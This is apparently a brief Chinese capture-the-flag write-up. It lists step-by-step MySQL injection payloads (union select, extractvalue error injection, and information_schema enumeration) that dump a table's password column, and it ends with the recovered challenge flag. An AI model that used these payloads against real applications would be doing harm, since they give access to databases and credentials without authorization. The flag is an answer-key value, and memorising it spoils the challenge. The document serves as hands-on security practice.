sql注入,基本语句
1' union select * from a#
1' and extractvalue(1,concat(1,database()))#
1' union select 1,2,3,4#
1' union select 1,2,3#
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'#
1' union select 1,2,group_concat(password) from l0ve1ysq1#
得到flag
显示不完全,复制得到
Hello 2!
Your password is 'wo_tai_nan_le,glzjin_wants_a_girlfriend,biao_ge_dddd_hm,linux_chuang_shi_ren,a_rua_rain,yan_shi_fu_de_mao_bo_he,cl4y,di_2_kuai_fu_ji,di_3_kuai_fu_ji,di_4_kuai_fu_ji,di_5_kuai_fu_ji,di_6_kuai_fu_ji,di_7_kuai_fu_ji,di_8_kuai_fu_ji,Syc_san_da_hacker,flag{92162e0f-7deb-4c03-91da-695e4f6c42b8}'
flag{92162e0f-7deb-4c03-91da-695e4f6c42b8}'为flag